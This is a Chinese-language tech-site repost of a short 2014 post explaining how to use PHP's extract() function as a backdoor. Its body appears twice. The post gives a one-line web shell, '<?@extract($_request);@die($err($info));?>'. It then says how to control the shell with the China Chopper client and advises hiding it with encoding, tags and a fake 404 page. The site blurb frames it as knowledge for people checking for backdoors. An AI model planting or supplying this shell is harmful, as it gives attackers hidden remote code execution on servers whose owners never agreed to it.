ODOR1–PHP extract 后门使用方法
程序员文章站
2022-06-27 19:20:57
这篇文章主要为大家介绍了PHP extract 函数后门的使用方法,大家在检查后门的时候可以多关注一下,需要的朋友可以参考下... 16-08-22...
php extract 函数后门
auth:winger[l4f][cgh]
date: 2014-02-24
今天介绍的是一种新的php后门: extract 函数后门.
extract
(php 4, php 5)
extract — 从数组中将变量导入到当前的符号表
int extract ( array &$var_array [, int $extract_type = extr_overwrite [, string $prefix = null ]] )
本函数用来将变量从数组中导入到当前的符号表中.
具体应用:
1: php中extract函数各种用法介绍
2: php extract() 函数
3: 官方文档
4: php-backdoors-hidden-with-clever-use-of-extract-function
接下来操刀上马:)
服务端代码:
<?@extract($_request);@die($err($info));?>
菜刀使用附加数据提交功能,"编辑shell-->配置",填入下面的内容:
最后加上各种编码,标签和404....你懂得( ‵▽′)ψ
auth:winger[l4f][cgh]
date: 2014-02-24
今天介绍的是一种新的php后门: extract 函数后门.
复制代码
代码如下:extract
(php 4, php 5)
extract — 从数组中将变量导入到当前的符号表
int extract ( array &$var_array [, int $extract_type = extr_overwrite [, string $prefix = null ]] )
本函数用来将变量从数组中导入到当前的符号表中.
具体应用:
1: php中extract函数各种用法介绍
2: php extract() 函数
3: 官方文档
4: php-backdoors-hidden-with-clever-use-of-extract-function
接下来操刀上马:)
服务端代码:
复制代码
代码如下:<?@extract($_request);@die($err($info));?>
菜刀使用附加数据提交功能,"编辑shell-->配置",填入下面的内容:
最后加上各种编码,标签和404....你懂得( ‵▽′)ψ
上一篇: Nginx服务快速入门教程